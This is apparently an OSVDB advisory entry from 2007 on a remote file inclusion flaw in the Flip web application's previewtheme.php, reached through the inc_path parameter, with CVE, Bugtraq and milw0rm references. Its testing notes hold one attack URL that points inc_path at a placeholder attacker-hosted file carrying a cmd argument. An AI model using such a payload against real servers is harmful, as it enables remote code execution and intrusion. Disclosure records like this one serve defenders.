Flip previewtheme.php inc_path Variable Remote File Inclusion

2007-02-04T00:00:00
ID OSVDB:35748
Type osvdb
Reporter OSVDB
Modified 2007-02-04T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/[path]/previewtheme.php?theme=1&inc_path=[attacker].txt?cmd

References:

ISS X-Force ID: 32174 Generic Exploit URL: http://milw0rm.com/exploits/3266 FrSIRT Advisory: ADV-2007-0476 CVE-2007-0785 Bugtraq ID: 22385